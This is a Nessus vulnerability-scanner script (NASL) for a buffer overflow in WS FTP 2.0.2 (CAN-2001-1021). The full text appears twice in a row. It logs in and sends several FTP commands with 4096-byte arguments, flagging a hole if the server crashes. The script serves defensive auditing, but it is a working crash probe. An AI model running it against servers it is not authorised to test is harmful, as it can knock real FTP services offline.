WS FTP 2.0.2 is vulnerable to buffer overflow on many commands.
This script should probably be merged with a couple of others so that we
have a generic overflow test on any FTP command.
TBD: add banner matching & "safe checks". If anybody has a WS FTP
server...
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
if(description)
{
#script_id(11094);
script_version ("$Revision$");
script_cve_id("CAN-2001-1021");
name["english"] = "WS FTP overflows";
script_name(english:name["english"]);
desc["english"] = "It was possible to shut down the remote
FTP server by issuing a command followed by a too long argument.
An attacker may use this flow to prevent your site from
sharing some resources with the rest of the world, or even
execute arbitrary code on your system.
Solution : upgrade to the latest version your FTP server.
Risk factor : High";
desc["francais"] = "Il s'est avéré possible de tuer
le serveur FTP distant en envoyant une commande
suivie d'un argument trop long.
Un pirate peut utiliser cette faille pour empêcher votre site de
partager des ressources avec le reste du monde, ou même exécuter
du code arbitraire sur votre système.
Solution : mettez à jour votre server FTP.
Facteur de risque : Elevé";
script_description(english:desc["english"], francais:desc["francais"]);
summary["english"] = "Attempts a buffer overflow on many commands";
summary["francais"] = "Essaye un débordement sur diverses commandes";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "ftp_anonymous.nasl",
"ftpserver_detect_type_nd_version.nasl");
script_require_keys("ftp/login");
script_require_ports("Services/ftp", 21);
exit(0);
}
#
if (safe_checks()) exit(0); # TBD: check banners
port = get_kb_item("Services/ftp");
if(!port) port = 21;
if (! get_port_state(port)) exit(0);
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");
if(!login) login = "ftp";
if (! password) password = "test@nessus.org";
soc = open_sock_tcp(port);
if(! soc) exit(0);
if(! ftp_log_in(socket:soc, user:login, pass:password))
{
close(soc);
exit(0);
}
cmd[0] = "DELE";
cmd[1] = "MDTM";
cmd[2] = "MLST";
cmd[3] = "MKD";
cmd[4] = "RMD";
cmd[5] = "RNFR";
cmd[6] = "RNTO";
cmd[7] = "SIZE";
cmd[8] = "STAT";
cmd[9] = "XMKD";
cmd[10] = "XRMD ";
pb=0;
for (i=0; i<11; i=i+1)
{
s = string(cmd[i], " /", crap(4096), "\r\n");
send(socket:soc, data:s);
r = recv_line(socket:soc, length:1024);
#if(!r) pb=pb+1;
r=send(socket: soc, data: string("QUIT\r\n"));
#if (!r) pb=pb+1;
r = recv_line(socket:soc, length:1024);
#if (!r) pb=pb+1;
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if (! soc) { security_hole(port); exit(0); }
ftp_log_in(socket:soc, user:login, pass:password);
}
send(socket: soc, data: string("QUIT\r\n"));
recv_line(socket:soc, length:1024);
close(soc);
#if (pb) security_warning(port); # is this wise?
This script should probably be merged with a couple of others so that we
have a generic overflow test on any FTP command.
TBD: add banner matching & "safe checks". If anybody has a WS FTP
server...
# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
if(description)
{
#script_id(11094);
script_version ("$Revision$");
script_cve_id("CAN-2001-1021");
name["english"] = "WS FTP overflows";
script_name(english:name["english"]);
desc["english"] = "It was possible to shut down the remote
FTP server by issuing a command followed by a too long argument.
An attacker may use this flow to prevent your site from
sharing some resources with the rest of the world, or even
execute arbitrary code on your system.
Solution : upgrade to the latest version your FTP server.
Risk factor : High";
desc["francais"] = "Il s'est avéré possible de tuer
le serveur FTP distant en envoyant une commande
suivie d'un argument trop long.
Un pirate peut utiliser cette faille pour empêcher votre site de
partager des ressources avec le reste du monde, ou même exécuter
du code arbitraire sur votre système.
Solution : mettez à jour votre server FTP.
Facteur de risque : Elevé";
script_description(english:desc["english"], francais:desc["francais"]);
summary["english"] = "Attempts a buffer overflow on many commands";
summary["francais"] = "Essaye un débordement sur diverses commandes";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_MIXED_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
francais:"Ce script est Copyright (C) 2002 Michel Arboi");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root à distance";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "ftp_anonymous.nasl",
"ftpserver_detect_type_nd_version.nasl");
script_require_keys("ftp/login");
script_require_ports("Services/ftp", 21);
exit(0);
}
#
if (safe_checks()) exit(0); # TBD: check banners
port = get_kb_item("Services/ftp");
if(!port) port = 21;
if (! get_port_state(port)) exit(0);
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");
if(!login) login = "ftp";
if (! password) password = "test@nessus.org";
soc = open_sock_tcp(port);
if(! soc) exit(0);
if(! ftp_log_in(socket:soc, user:login, pass:password))
{
close(soc);
exit(0);
}
cmd[0] = "DELE";
cmd[1] = "MDTM";
cmd[2] = "MLST";
cmd[3] = "MKD";
cmd[4] = "RMD";
cmd[5] = "RNFR";
cmd[6] = "RNTO";
cmd[7] = "SIZE";
cmd[8] = "STAT";
cmd[9] = "XMKD";
cmd[10] = "XRMD ";
pb=0;
for (i=0; i<11; i=i+1)
{
s = string(cmd[i], " /", crap(4096), "\r\n");
send(socket:soc, data:s);
r = recv_line(socket:soc, length:1024);
#if(!r) pb=pb+1;
r=send(socket: soc, data: string("QUIT\r\n"));
#if (!r) pb=pb+1;
r = recv_line(socket:soc, length:1024);
#if (!r) pb=pb+1;
close(soc);
sleep(1);
soc = open_sock_tcp(port);
if (! soc) { security_hole(port); exit(0); }
ftp_log_in(socket:soc, user:login, pass:password);
}
send(socket: soc, data: string("QUIT\r\n"));
recv_line(socket:soc, length:1024);
close(soc);
#if (pb) security_warning(port); # is this wise?
